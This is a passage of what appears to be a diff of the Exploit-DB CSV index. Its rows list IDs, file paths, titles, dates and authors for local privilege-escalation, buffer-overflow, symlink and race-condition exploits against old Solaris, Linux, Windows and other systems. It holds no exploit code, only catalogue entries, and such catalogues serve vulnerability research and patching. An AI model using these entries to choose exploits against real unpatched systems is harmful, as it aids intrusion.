Hassell",solaris,local, -20746,exploits/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 - Limited Password-Space",2001-04-10,"Thomas Roessler",palm_os,local, -20751,exploits/solaris/local/20751.txt,"Solaris 7.0/8 - IPCS Timezone Buffer Overflow",2001-04-12,"Riley Hassell",solaris,local, -20766,exploits/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 CDE - '/usr/dt/bin/dtsession' Local Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local, -20767,exploits/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local, -20768,exploits/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)",1999-12-01,"Last Stage of Delirium",solaris,local, -20769,exploits/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition",2001-04-14,"Ruiz Garcia",unix,local, -20772,exploits/solaris/local/20772.c,"Solaris 2.5/2.6/7.0/8 - 'mailx -F' Local Buffer Overflow (1)",2001-04-01,"Pablo Sor",solaris,local, -20773,exploits/solaris/local/20773.c,"Solaris 2.5/2.6/7.0/8 - 'mailx -F' Local Buffer Overflow (2)",2001-04-15,"Pablo Sor",solaris,local, -20776,exploits/linux/local/20776.c,"Samba 2.0.x - Insecure TMP File Symbolic Link",2001-04-17,"Gabriel Maggiotti",linux,local, -20777,exploits/linux/local/20777.c,"ISC INN 2.x - Command-Line Buffer Overflow (1)",2001-04-18,"Enrique A.",linux,local, -20778,exploits/linux/local/20778.sh,"ISC INN 2.x - Command-Line Buffer Overflow (2)",2001-04-18,"Enrique A.",linux,local, -20781,exploits/linux/local/20781.txt,"SuSE 7.0 - KFM Insecure '.TMP' File Creation",2001-04-18,"Paul Starzetz",linux,local, -20795,exploits/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,linux,local, -20798,exploits/linux/local/20798.sh,"Sendfile 1.x/2.1 - Forced Privilege Lowering Failure",2001-04-24,"Cade Cairns",linux,local, -20804,exploits/irix/local/20804.c,"IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage",2001-04-26,V9,irix,local, -40422,exploits/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local, -20822,exploits/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local, -20823,exploits/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local, -20843,exploits/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow",2001-05-13,"zenith parsec",linux,local, -20851,exploits/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local, -20861,exploits/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local, -20867,exploits/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local, -20868,exploits/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client - inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local, -20880,exploits/windows/local/20880.c,"Microsoft Windows Server 2000 - Debug Registers",2001-05-24,"Georgi Guninski",windows,local, -20885,exploits/solaris/local/20885.c,"Solaris 8 mailtool - Local Buffer Overflow",2001-06-01,51,solaris,local, -20897,exploits/linux/local/20897.sh,"Debian 2.1/2.2 - Man Cache File Creation",2001-06-01,jenggo,linux,local, -20898,exploits/linux/local/20898.sh,"RedHat 6.1/6.2/7.0/7.1 - Man Cache File Creation",2001-05-18,jenggo,linux,local, -20900,exploits/linux/local/20900.txt,"Exim 3.x - Format String",2001-06-06,"Megyer Laszlo",linux,local, -20901,exploits/linux/local/20901.c,"Sudo 1.5/1.6 - Heap Corruption",2001-02-22,MaXX,linux,local, -20905,exploits/unix/local/20905.txt,"Thibault Godouet FCron 1 - Symbolic Link",2001-06-07,"Uwe Ohse",unix,local, -20906,exploits/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Local Buffer Overflow",2001-06-07,dex,unix,local, -20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",windows,local, -20923,exploits/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,unix,local, -20926,exploits/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow",2001-06-12,zen-parse,linux,local, -20927,exploits/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",linux,local, -20928,exploits/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Local Buffer Overflow",2001-06-15,MasterSecuritY,linux,local, -20937,exploits/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link",2001-06-18,IhaQueR,irix,local, -20945,exploits/solaris/local/20945.txt,"Sun SunVTS 4.x - PTExec Buffer Overflow",2001-06-21,"Pablo Sor",solaris,local, -20960,exploits/unix/local/20960.c,"Juergen Schoenwaelder scotty 2.1.x - ntping Buffer Overflow",2001-06-13,"Larry W. Cashdollar",unix,local, -20961,exploits/unix/local/20961.sh,"KDE KTVision 0.1 - File Overwrite",2001-06-21,IhaQueR,unix,local, -20962,exploits/unix/local/20962.pl,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (1)",2001-06-21,teleh0r,unix,local, -20963,exploits/unix/local/20963.c,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (2)",2001-07-11,"Megyer Laszlo",unix,local, -20964,exploits/unix/local/20964.c,"cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (3)",2001-07-10,qitest1,unix,local, -20965,exploits/aix/local/20965.sh,"AIX 4.3/5.1 - diagrpt Arbitrary Privileged Program Execution",2003-05-23,watercloud,aix,local, -20967,exploits/linux/local/20967.c,"Vim 5.x - Swap File Race Condition",2001-01-26,zen-parse,linux,local, -20969,exploits/solaris/local/20969.c,"Solaris 8 libsldap - Local Buffer Overflow (1)",2001-06-26,noir,solaris,local, -20970,exploits/solaris/local/20970.c,"Solaris 8 libsldap - Local Buffer Overflow (2)",2001-06-27,Fyodor,solaris,local, -20974,exploits/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo - Local Buffer Overflow",2001-06-01,"Pablo Sor",solaris,local, -20979,exploits/linux/local/20979.c,"Linux Kernel 2.2/2.4 - procfs Stream redirection to Process Memory Privilege Escalation",2001-06-27,zen-parse,linux,local, -20985,exploits/php/local/20985.php,"PHP 4.x - SafeMode Arbitrary File Execution",2001-06-30,"Wojciech Purczynski",php,local, -20986,exploits/linux/local/20986.c,"Xvt 2.1 - Local Buffer Overflow",2001-07-02,"Christophe Bailleux",linux,local, -20988,exploits/linux/local/20988.c,"CylantSecure 1.0 - Kernel Module Syscall Rerouting",2001-06-29,"Juergen Pabel",linux,local, -20990,exploits/linux/local/20990.c,"teTeX 1.0.7 - Filters Temporary File Race Condition",2001-06-22,zen-parse,linux,local, -20992,exploits/linux/local/20992.c,"Lmail 2.7 - Temporary File Race Condition",2001-07-04,"Charles Stevenson",linux,local, -20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",hardware,local, -21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,hardware,local, -21001,exploits/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (3)",2001-07-10,ml85p,hardware,local, -21010,exploits/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan - ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local, -21014,exploits/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local, -21020,exploits/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,multiple,local, -21024,exploits/solaris/local/21024.c,"Solaris 2.6/7.0 - DTMail Mail Environment Variable Buffer Overflow",2001-07-24,"NSFOCUS Security Team",solaris,local, -21043,exploits/linux/local/21043.c,"GNU findutils 4.0/4.1 - Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local, -21044,exploits/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local, -21045,exploits/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 - Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local, -21058,exploits/solaris/local/21058.c,"Solaris 2.6/7/8 (SPARC) - xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local, -21059,exploits/solaris/local/21059.c,"Solaris 8 - x86 xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local, -21060,exploits/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1)",2001-08-17,grange,linux,local, -21061,exploits/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local, -21062,exploits/linux/local/21062.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (3)",2001-08-17,"Lucian Hudin",linux,local, -21063,exploits/linux/local/21063.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (4)",2001-08-17,"RoMaN SoFt",linux,local, -21069,exploits/windows/local/21069.c,"Microsoft Windows Server 2000 - RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,windows,local, -21070,exploits/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 - Insecure Password",2001-08-15,"Macintosh Security",osx,local, -21071,exploits/windows/local/21071.c,"Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Escalation",2001-08-15,Indigo,windows,local, -21072,exploits/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Escalation",2001-08-15,"Digital Offense",windows,local, -21073,exploits/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local, -21076,exploits/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 - Weak Password Encryption",2001-08-20,MacSec,osx,local, -21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",multiple,local, -21256,exploits/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow (Metasploit)",2012-09-12,Metasploit,windows,local, -21090,exploits/windows/local/21090.txt,"CuteFTP 4.2 - Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local, -21091,exploits/windows/local/21091.txt,"UltraEdit 8.2 - FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",windows,local, -21094,exploits/aix/local/21094.c,"AIX 4.2/4.3 - '/usr/lib/lpd/pio/etc/piomkapqd' Local Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local, -21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local, -21098,exploits/hp-ux/local/21098.c,"HP-UX 11.0 - SWVerify Buffer Overflow",2001-09-03,foo,hp-ux,local, -21101,exploits/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local, -21105,exploits/unix/local/21105.c,"Digital Unix 4.0 - MSGCHK Buffer Overflow",2001-09-05,seo,unix,local, -21106,exploits/unix/local/21106.txt,"Taylor UUCP 1.0.6 - Argument Handling Privilege Escalation",2001-09-08,zen-parse,unix,local, -21107,exploits/unix/local/21107.sh,"Digital Unix 4.0 - MSGCHK MH_PROFILE Symbolic Link",2001-09-10,seo,unix,local, -21108,exploits/unix/local/21108.txt,"SpeechD 0.1/0.2 - Privileged Command Execution",2001-09-11,"Tyler Spivey",unix,local, -21114,exploits/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading",2001-09-17,"Przemyslaw Frasunek",freebsd,local, -21117,exploits/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflows",2001-10-05,kf,multiple,local, -21120,exploits/unix/local/21120.c,"Snes9x 1.3 - Local Buffer Overflow",2001-10-16,"Niels Heinen",unix,local, -21124,exploits/linux/local/21124.txt,"Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation",2001-10-18,"Rafal Wojtczuk",linux,local, -21130,exploits/windows/local/21130.c,"Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local, -21139,exploits/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,windows,local, -40418,exploits/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local, -21150,exploits/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local, -21158,exploits/linux/local/21158.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local, -21159,exploits/linux/local/21159.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Local Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local, -21173,exploits/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 - Weak 'Username' and Password Encryption",2001-12-07,shoeboy,windows,local, -21176,exploits/freebsd/local/21176.c,"FreeBSD 4.4 - AIO Library Cross Process Memory Write",2001-12-10,"David Rufino",freebsd,local, -40417,exploits/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local, -21216,exploits/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local, -21217,exploits/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local, -21218,exploits/linux/local/21218.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,linux,local, -21219,exploits/linux/local/21219.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (4)",2002-01-13,"Karol Wiesek",linux,local, -21226,exploits/linux/local/21226.c,"IMLib2 - Home Environment Variable Buffer Overflow",2002-01-13,"Charles Stevenson",linux,local, -21227,exploits/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation",2002-01-14,"Charles Stevenson",linux,local, -21229,exploits/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",linux,local, -21231,exploits/linux/local/21231.c,"Chinput 3.0 - Environment Variable Buffer Overflow",2002-01-16,xperc,linux,local, -21239,exploits/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 - WebTop 'SCOAdminReg.cgi' Arbitrary Command Execution",2002-01-20,jGgM,unixware,local, -21244,exploits/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local, -21247,exploits/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local, -21248,exploits/linux/local/21248.txt,"User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local, -21258,exploits/linux/local/21258.bat,"Microsoft Windows NT 4.0/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local, -21259,exploits/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local, -21280,exploits/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local, -21281,exploits/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local, -21282,exploits/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Directory Escaping",2002-02-07,Jedi/Sector,atheos,local, -21283,exploits/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local, -21284,exploits/unixware/local/21284.c,"Caldera UnixWare 7.1.1 - Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local, -21288,exploits/multiple/local/21288.txt,"Sawmill 6.2.x - Admin Password Insecure Default Permissions",2002-02-11,darky0da,multiple,local, -21290,exploits/unix/local/21290.sh,"Tarantella Enterprise 3 - Symbolic Link",2002-02-19,"Larry W. Cashdollar",unix,local, -21302,exploits/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local, -21318,exploits/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local, -21320,exploits/windows/local/21320.pl,"Internet Download Manager - Local Buffer Overflow (SEH)",2012-09-14,Dark-Puzzle,windows,local, -21323,exploits/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local, -21331,exploits/windows/local/21331.py,"NCMedia Sound Editor Pro 7.5.1 - 'MRUList201202.dat' File Handling Buffer Overflow",2012-09-17,"Julien Ahrens",windows,local, -21341,exploits/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local, -21342,exploits/linux/local/21342.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local, -21344,exploits/windows/local/21344.txt,"Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Escalation",2002-03-13,EliCZ,windows,local, -21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,php,local, -21348,exploits/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local, -21351,exploits/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 - Weak Password Encryption",2002-03-22,c3rb3r,windows,local, -21353,exploits/linux/local/21353.c,"Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC)",2002-03-26,cliph,linux,local, -21356,exploits/linux/local/21356.sh,"LogWatch 2.1.1/2.5 - Insecure Temporary Directory Creation",2002-03-27,spybreak,linux,local, -21359,exploits/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local, -21360,exploits/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 - XSun Color Database File Heap Overflow",2002-04-02,gloomy,solaris,local, -21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local, -21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",openbsd,local, -21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local, -21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local, -21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local, -21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local, -21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",unix,local, -21420,exploits/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local, -21458,exploits/linux/local/21458.txt,"Grsecurity Kernel Patch 1.9.4 (Linux Kernel) - Memory Protection",2002-05-17,"Guillaume PELAT",linux,local, -21462,exploits/freebsd/local/21462.sh,"FreeBSD 4.x - Process Concealment Bypass",2002-05-18,anonymous,freebsd,local, -21489,exploits/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 - SCOAdmin Symbolic Link",2002-05-29,"Kevin Finisterre",sco,local, -21496,exploits/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec - Local Buffer Overflow (1)",2002-05-30,smurf,linux,local, -21497,exploits/linux/local/21497.pl,"IBM Informix SE 7.25 sqlexec - Local Buffer Overflow (2)",2002-05-30,pHrail,linux,local, -21499,exploits/linux/local/21499.txt,"QNX RTOS 4.25 - 'CRTTrap' File Disclosure",2002-05-31,"Simon Ouellette",linux,local, -21500,exploits/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local, -21501,exploits/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local, -21502,exploits/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local, -21503,exploits/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation",2002-06-03,badc0ded,linux,local, -21504,exploits/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Local Privilege Escalation",2002-06-03,badc0ded,linux,local, -21505,exploits/linux/local/21505.c,"QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local, -21506,exploits/linux/local/21506.c,"QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow",2002-06-03,badc0ded,linux,local, -21507,exploits/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local, -21516,exploits/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 - Terminator Function Format String",2002-06-06,stringz,unix,local, -21538,exploits/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 - Open File Descriptor",2002-06-12,"Patrick Smith",linux,local, -21547,exploits/windows/local/21547.txt,"Smartfren Connex EC 1261-2 UI OUC - Local Privilege Escalation",2012-09-27,X-Cisadane,windows,local, -21549,exploits/windows/local/21549.txt,"Microsoft SQL Server 2000 - Password Encrypt procedure Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local, -21550,exploits/windows/local/21550.txt,"Lumigent Log Explorer XP - _LogAttach_StartProf Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local, -21551,exploits/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 - XP_LogAttach_SetPort Buffer Overflow",2002-06-14,"Martin Rakhmanoff",windows,local, -21565,exploits/unix/local/21565.pl,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)",2002-06-15,stripey,unix,local, -21566,exploits/unix/local/21566.c,"Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)",2002-06-18,bob,unix,local, -21568,exploits/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,linux,local, -40348,exploits/win_x86-64/local/40348.py,"Dropbox Desktop Client 9.4.49 (x64) - Local Credentials Disclosure",2016-09-08,"Yakir Wizman",win_x86-64,local, -21577,exploits/hp-ux/local/21577.c,"HP CIFS/9000 Server A.01.05/A.01.06 - Local Buffer Overflow",2002-11-06,watercloud,hp-ux,local, -21583,exploits/linux/local/21583.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local, -21584,exploits/linux/local/21584.pl,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local, -21585,exploits/linux/local/21585.c,"Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local, -21592,exploits/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 - Password Disclosure",2002-07-03,"Richard van den Berg",unix,local, -40440,exploits/multiple/local/40440.py,"KeepNote 0.7.8 - Command Execution",2016-09-29,R-73eN,multiple,local, -21623,exploits/linux/local/21623.txt,"Python 1.5.2 Pickle - Unsafe 'eval()' Code Execution",2002-07-17,"Jeff Epler",linux,local, -21624,exploits/linux/local/21624.py,"Python 1.5/1.6/2.0/2.1.x - Pickle Class Constructor Arbitrary Code Execution",2002-07-17,"Jeff Epler",linux,local, -21629,exploits/windows/local/21629.txt,"Adobe eBook Reader 2.2 - File Restoration Privilege Escalation",2002-07-19,"Vladimir Katalov",windows,local, -21666,exploits/linux/local/21666.txt,"soapbox 0.3.1 - Local Privilege Escalation",2012-10-02,"Jean Pascal Pereira",linux,local, -21667,exploits/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",linux,local, -21669,exploits/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local, -40362,exploits/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local, -40365,exploits/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Local Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local, -40429,exploits/windows/local/40429.cs,"Microsoft Windows 8.1 Update 2 / 10 10586 (x86/x64) - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local, -21674,exploits/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local, -21683,exploits/linux/local/21683.c,"qmailadmin 1.0.x - Local Buffer Overflow",2002-08-06,"Thomas Cannon",linux,local, -21684,exploits/windows/local/21684.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (1)",2002-08-06,sectroyer,windows,local, -21685,exploits/windows/local/21685.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)",2002-08-06,"Oliver Lavery",windows,local, -21686,exploits/windows/local/21686.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3)",2002-08-06,"Brett Moore",windows,local, -21687,exploits/windows/local/21687.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)",2002-08-06,"Brett Moore",windows,local, -21688,exploits/windows/local/21688.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (5)",2002-08-06,"Oliver Lavery",windows,local, -21689,exploits/windows/local/21689.c,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (6)",2002-08-06,"Brett Moore",windows,local, -21690,exploits/windows/local/21690.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (7)",2002-08-06,"Ovidio Mallo",windows,local, -21691,exploits/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local, -21700,exploits/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local, -21701,exploits/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local, -21713,exploits/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - Local Overflow (SEH + DEP Bypass)",2012-10-03,b33f,windows,local, -21720,exploits/irix/local/21720.txt,"SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing",2002-08-16,"Michael Wardle",irix,local, -21721,exploits/windows/local/21721.html,"Microsoft Internet Explorer 4/5/6 - XML Datasource Applet File Disclosure",2002-08-17,Jelmer,windows,local, -21732,exploits/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",linux,local, -21733,exploits/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 - Predictable Temporary Filename Symbolic Link Attack",2002-06-28,"Charles Stevenson",linux,local, -21758,exploits/unix/local/21758.txt,"Caldera X Server 7.1/8.0 - External Program Privileged Invocation",2002-08-27,"Olaf Kirch",unix,local, -21760,exploits/unix/local/21760.c,"GDAM123 0.933/0.942 - Filename Buffer Overflow",2002-08-24,"Netric Security",unix,local, -21761,exploits/linux/local/21761.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)",2002-08-28,RaiSe,linux,local, 